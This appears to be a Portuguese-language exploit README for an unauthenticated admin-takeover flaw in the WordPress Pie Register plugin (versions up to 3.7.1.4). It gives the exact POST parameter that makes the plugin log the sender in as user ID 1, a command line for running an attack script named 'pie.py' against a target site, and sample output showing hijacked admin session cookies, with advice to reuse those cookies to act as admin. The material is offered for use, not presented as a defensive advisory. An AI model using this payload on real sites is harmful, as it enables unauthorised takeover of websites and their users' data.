
WordPress Pie Register ≤ 3.7.1.4 - Escalação de Privilégios de Administrador (Não Autenticado)
Mrj Haxcore
O plugin Pie Register para WordPress (versão ≤ 3.7.1.4) expõe um endpoint não autenticado que permite a um invasor sequestrar sessões de admin simplesmente enviando um payload específico via POST.
A exploração resulta no roubo dos cookies de sessão do usuário ID 1 (geralmente admin) sem necessidade de credenciais de login.
pie-registeruser_id_social_site=1
Quando enviado para a URL raiz (/), este parâmetro faz com que o plugin autentique o invasor como o usuário com ID 1 (tipicamente admin), e emita cookies de sessão válidos.
requests, beautifulsoup4 (opcional, para parsing de cookies)python3 pie.py http://target.site
---
Saída
[*] Sending payload to hijack admin session...
[+] Successfully hijacked cookies for user_id=1 (admin):
wordpress_sec_xxxxxx = <cookie_value>
wordpress_logged_in_xxxxxx = <cookie_value>
[!] Use estes cookies no seu navegador ou ferramentas como curl ou Burp para agir como admin.